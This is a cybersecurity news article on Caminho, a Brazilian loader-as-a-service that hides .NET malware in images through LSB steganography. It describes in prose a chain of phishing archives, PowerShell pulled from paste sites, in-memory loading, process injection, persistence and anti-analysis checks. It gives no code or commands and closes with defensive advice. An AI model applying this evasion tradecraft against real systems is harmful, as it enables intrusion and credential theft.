Cybersecurity researchers at Arctic Wolf Labs have uncovered a cunning new threat dubbed Caminho, a Brazilian Loader-as-a-Service (LaaS) that’s turning everyday images into Trojan horses for malware.
Active since March 2025 and evolved rapidly by June, this operation hides .NET payloads using Least Significant Bit (LSB) steganography inside files hosted on trusted sites like archive.org.
The technique allows attackers to smuggle remote access tools and infostealers past defenses, targeting businesses across South America, Africa, and Eastern Europe.
The attack kicks off with spear-phishing emails laced with social engineering bait, like fake invoices or urgent quotes, disguised as RAR or ZIP archives containing JavaScript or VBScript files.
Once opened, these scripts fetch obfuscated PowerShell code from pastebin services such as paste.ee, which then pulls down seemingly innocent images from legitimate archives.
Hidden within these JPG or PNG files is a .NET loader named Caminho—Portuguese for “path”—extracted via LSB steganography that tweaks the least significant bits of pixel colors to encode malicious data without altering the image’s appearance.
The PowerShell script scans for a unique byte signature in the image, isolates the embedded payload, and loads it straight into memory, bypassing disk writes to evade antivirus scans.
From there, the loader injects the final malware into benign processes like calc.exe, the Windows calculator, while setting up persistence through scheduled tasks that rerun the chain every minute.
This fileless approach, combined with anti-analysis tricks like VM detection and debugger checks, makes Caminho notoriously hard to spot. Researchers analyzed 71 samples, all featuring heavy obfuscation but consistent Portuguese strings and a quirky HackForums namespace, pointing to a modular design built for reuse.
Loader-as-a-Service Fuels Payload Variety
What sets Caminho apart is its business model: a service where operators rent the loader to deliver custom malware, accepting any URL as an argument for flexibility.
Observed payloads include the versatile REMCOS RAT for remote control, via bulletproof hosting; XWorm from shady domains; and Katz Stealer, a credential grabber first noted by Nextron Systems in May 2025.
The same steganographic images pop up across campaigns with different endgames, confirming this rental setup and explaining the payload diversity.
Infrastructure mixes legit platforms for staging—archive.org for images, paste sites for scripts—with resilient C2 servers on providers like Railnet LLC, known for dodging takedowns.
High-confidence attribution ties Caminho to Brazil, thanks to pervasive Portuguese code in variables, errors, and comments, plus targeting that starts in South America and spikes during local business hours.
Victims span industries in Brazil, South Africa, Ukraine, and Poland, with geographic spread accelerating post-June as steganography matured the operation.
No nation-state vibes here; it’s financially driven cybercrime, abusing trusted sites to challenge traditional blocks without disrupting legit traffic.
As threats like this grow, experts urge layered defenses: sandbox attachments, PowerShell logging, and AI-driven EDR to catch behavioral red flags.
Caminho shows how steganography is no longer niche—it’s a go-to for evading the spotlight in an arms race against detection. With the campaign still active into October 2025, organizations must stay vigilant against these hidden paths to infection.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
